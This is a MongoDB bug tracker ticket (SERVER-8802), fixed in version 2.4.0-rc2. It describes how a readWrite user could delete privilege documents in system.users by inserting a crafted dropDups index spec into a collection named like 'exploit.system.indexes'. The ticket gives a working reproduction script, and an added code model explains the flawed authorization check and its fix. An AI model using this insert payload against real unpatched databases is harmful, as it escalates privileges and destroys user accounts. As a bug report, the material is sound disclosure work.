  1. Core Server
  2. SERVER-8802

readWrite users can delete privilege documents via ensureIndex

    Details

    • Type: Bug
    • Status: Closed
    • Priority: Major - P3
    • Resolution: Fixed
    • Affects Version/s: 2.4.0-rc1
    • Fix Version/s: 2.4.0-rc2
    • Component/s: Security
    • Labels:
      None

      Description

      There is (arguably) an error in the logic that decides whether to associate ActionType::ensureIndex with an insert request. A readWrite user can exploit this error to initiate a dropDups index build on system.users by writing to a collection named e.g. exploit.system.indexes.

      Reproduce with:

      conn = MongoRunner.runMongod({auth:''})
       
      adminDb = conn.getDB("admin")
      testDb = conn.getDB("test")
      adminDb.addUser({user:'admin', pwd:'x', roles:['userAdminAnyDatabase']})
      adminDb.auth('admin','x')
      adminDb.addUser({user:'mallory', pwd:'x', roles:[], otherDBRoles:{test:['readWrite']}})
      testDb.addUser({user:'user1', pwd:'x', roles:['read']})
      testDb.addUser({user:'user2', pwd:'x', roles:['read']})
      assert.eq(2, testDb.system.users.count())
      adminDb.logout()
       
      adminDb.auth('mallory','x')
      testDb.exploit.system.indexes.insert({ns: "test.system.users", key: { haxx: 1.0 }, name: "haxx_1", unique: true, dropDups: true})
      adminDb.logout()
       
      adminDb.auth('admin','x')
      // The following fails with "assert: [2] != [1] are not equal : undefined"
      assert.eq(2, testDb.system.users.count()) 
       
      MongoRunner.stopMongod(conn)
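
The mismatch the description points at, as an added model that is not MongoDB source code and not part of the ticket. It assumes the privilege check recognised index inserts only by the exact collection name while the write path matched on a suffix; all function names and the grant model are hypothetical.

```javascript
// Simplified model, not MongoDB source. Assumption (not stated in the ticket):
// the write path treats any collection name ending in "system.indexes" as an
// index build, while the privilege check recognised only the exact name.

// Split "db.coll" at the first dot; the collection part may itself contain dots.
function splitNs(ns) {
  const i = ns.indexOf(".");
  return { db: ns.slice(0, i), coll: ns.slice(i + 1) };
}

// Hypothetical write-path predicate: is this insert executed as an index build?
function executesAsIndexBuild(ns) {
  return splitNs(ns).coll.endsWith("system.indexes");
}

// Flawed derivation: its own, narrower test for "this insert is an ensureIndex".
function requiredPrivilegeFlawed(ns, doc) {
  return splitNs(ns).coll === "system.indexes"
    ? { action: "ensureIndex", resource: doc.ns }
    : { action: "insert", resource: ns };
}

// Corrected derivation: reuse the write path's predicate, so anything executed
// as an index build is authorized as ensureIndex on the index's target namespace.
function requiredPrivilegeFixed(ns, doc) {
  return executesAsIndexBuild(ns)
    ? { action: "ensureIndex", resource: doc.ns }
    : { action: "insert", resource: ns };
}

// Constructed grant model for readWrite on one database: insert and ensureIndex
// on ordinary collections, nothing on system.* collections such as system.users.
function readWriteAllows(dbName, priv) {
  const { db, coll } = splitNs(priv.resource);
  return db === dbName && !coll.startsWith("system.") &&
    (priv.action === "insert" || priv.action === "ensureIndex");
}

// The insert from the reproduction script above.
const ns = "test.exploit.system.indexes";
const spec = { ns: "test.system.users", key: { haxx: 1 }, name: "haxx_1",
               unique: true, dropDups: true };

console.log("flawed:", readWriteAllows("test", requiredPrivilegeFlawed(ns, spec))); // true
console.log("fixed: ", readWriteAllows("test", requiredPrivilegeFixed(ns, spec)));  // false
```

The point of the corrected form is that authorization and execution share one classification of the request, so the privilege is always checked against the namespace the index build will actually touch.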

              People

              Assignee:
              spencer Spencer Brody (Inactive)
              Reporter:
              rassi J Rassi